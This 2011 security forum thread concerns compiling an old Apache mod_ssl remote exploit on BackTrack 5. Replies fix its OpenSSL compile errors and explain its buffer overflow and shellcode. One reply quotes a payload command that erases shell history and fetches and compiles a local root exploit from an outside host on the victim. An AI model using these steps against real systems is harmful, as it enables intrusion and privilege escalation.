need help compiling exploit in backtrack5

This topic has 8 replies, 6 voices, and was last updated 9 years, 4 months ago by MaXe.

Viewing 8 reply threads

Author

Posts
- July 25, 2011 at 9:30 pm #6639
  
  jinwald12
  Participant
  
  hi i am doing a pen test and the only vulnerability i can find is in the web server so i found exploit code no problem but it depends on an older version of OpenSSL that is not compatible with backtrack5 i am not very good with GCC so can someone help me compile this exploit in backtrack5 here is the exploit:
  http://www.exploit-db.com/exploits/764/
  
  many thanks
- July 25, 2011 at 10:27 pm #41261
  
  Anonymous
  Participant
  
  Hi jinwald12,
  
  First of all I don’t think anyone will help you with this. If you are not sure how to compile something and don’t understand how it works then you should not really be running it. Most security experts will not tell anyone how to run an exploit because you might be using it for unethical reasons.
  
  The best advice I can really give you is take a look at GCC and try work it out yourself. Or maybe try thinking outside the box see if you can come up with another way in. Remember sometimes the most simplest things can work.
- July 25, 2011 at 10:45 pm #41262
  
  jinwald12
  Participant
  
  i understand the problem it is that backtrack uses too modern a version of OpenSSL and this exploit depends on a older version the problem is i do not know exactly what version of OpenSSL it needs or how to specify the proper header file to GCC that is my problem not that i dont know how the exploit works. i just need help locating and specifying the propper header files
- July 25, 2011 at 10:47 pm #41263
  
  jinwald12
  Participant
  
  and since i first posted i learned that i need to use the -I directive to specify a external library so now i just need to know what version of OpenSSL it depends on and where i can get it
- July 26, 2011 at 2:38 pm #41264
  
  lorddicranius
  Participant
  
  I don’t have any experience compiling exploits and this may seem like a really roundabout way of doing it, but couldn’t you take the date the exploit was published (2003-04-04) and narrow down which version you need? You know that if the exploit was published April 2003, so the writer couldn’t have used a newer version than that. You can download openssl tarballs here.
- July 26, 2011 at 2:59 pm #41265
  Data_Raid
  Participant
  Analysing the code in detail and the errors when trying to compile the code will help you. The exploit is pretty old (2003) too which will might cause compilation errors when compiling on systems that have updated code such as OpenSSL. When you try and compile the code on BT5 you probably had the errors listed below:
  
  error: expected specifier-qualifier-list before ‘RC4_KEY’
  In function ‘ssl_connect_host’:
  error: ‘ssl_conn’ has no member named ‘encrypted’
  
  and: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
  
  The first error that mentions RC4_KEY indicates that the exploit code includes RC4 commands but the exploit code has missing RC4 header defined in the code.
  
  Further down in the code you see instructions for:
  /* session keys */
  unsigned char* read_key;
  unsigned char* write_key;
  RC4_KEY* rc4_read_key;
  RC4_KEY* rc4_write_key;
  
  and further down in the code:
  
  MD5_Init(&ctx);
  MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
  MD5_Update(&ctx, rec, rec_len);
  MD5_Update(&ctx, &seq, 4);
  MD5_Final(p, &ctx);
  
  Additional info: http://www.openssl.org/docs/crypto/rc4.html
  http://www.openssl.org/docs/crypto/md5.html
  
  The exploit also downloads another exploit ptrace-kmod.c from the victim machine and compiles it locally:
  
  wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c;
  
  That URL listed above is no longer valid, but the exploit code is still available at various locations, for example: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c
  You can download the ptrace-kmod.c exploit locally on your BT5 machine and then host the file using Apache, you would need to modify the exploit code to reflect this though in the wget line. Using the securityfocus URL assumes the following: the victim machine can connect to that URL and also assumes that gcc is installed so that the ptrace-kmod.c exploit can be compiled once downloaded.
  
  If you modify the exploit code as follows, it should compile fine on BT5, make sure that you have installed the development libraries for SSL (apt-get install libssl-dev) only changes are listed:
```
#include 

#include 

#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-k$
```
  Let me know if this works for you or if you have any questions.
  
  Good luck! 😉
  
  PS. tested on both Backtrack 4 and 5
- July 30, 2011 at 1:23 am #41266
  
  jinwald12
  Participant
  
  thanks but when i add that code i get this error messege
  
  /root/Desktop/development/OpenFuckV2original.c:17:26: error: openssl h=””: No such file or directory
  /root/Desktop/development/OpenFuckV2original.c:25:18: warning: missing terminating ” character
  /root/Desktop/development/OpenFuckV2original.c:664:1: warning: “COMMAND2” redefined
  /root/Desktop/development/OpenFuckV2original.c:25:1: warning: this is the location of the previous definition
  /root/Desktop/development/OpenFuckV2original.c: In function ‘get_server_hello’:
  /root/Desktop/development/OpenFuckV2original.c:1010: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type
  /usr/include/openssl/x509.h:939: note: expected ‘const unsigned char **’ but argument is of type ‘unsigned char **’
  i tried removing the call to openssl h=”” but then i get the old error message
- September 23, 2011 at 3:06 pm #41267
  
  uperkurk
  Participant
  
  Just had a look at that exploit code and dam thats alot of code O_0 looks so confusing, what language is it
- September 25, 2011 at 10:30 pm #41268
  
  MaXe
  Participant
  
  @uperkurk wrote:
  
  Just had a look at that exploit code and dam thats alot of code O_0 looks so confusing, what language is it
  
  It’s an exploit for a bug in Apache OpenSSL, where a few tools may already have this (exploit) compiled and ready to use. (Hint: Metasploit is one I’d try, or perhaps even the SecurityForest Exploitation Framework.)
  
  This Exploit: http://www.exploit-db.com/exploits/764/
  
  Is written in the programming language known as: C
  
  A quick overview of this code:
  – The 20 first lines are includes (libraries with functions necessary for this “program” to work.)
  – From that and down to the line: “Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)”, it appears to be “Return Addresses” which EIP is overwritten with. (Basically it’s an address in memory where the execution will be forced to.)
  – Near the “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA” part, it’s the buffer to cause this error. A (yes the letter A), is often used to fuzz with. This is especially seen in older buffer overflows.
  – Near “x90x90x90x90” we have the beginning of the actual shellcode it seems, as x90 is a NOP (No Operator / No Instruction, often used for better reliability and stability of the exploit due to different memory layouts on different systems.
  
  The rest is pretty much crafting a “legitimate” SSL packet and then sending it off, including a “how to use this program”.
  
  The packet being sent, overflows a buffer, which eventually leads to remote code execution in this scenario.
  
  I know it’s a very rough breakdown of the exploit, but I hope you gained some new knowledge from my reply 🙂
  
  If you want some info on how to write buffer overflows there’s various resources, including a video I once made a couple of years ago:
  http://guides.intern0t.net/msf2.php (it’s a very simple overflow, but nice for beginners in this area, etc.)
  
  References:
  http://www.woodmann.com/collaborative/sectools/index.php/SecurityForest_Exploitation_Framework
Author

Posts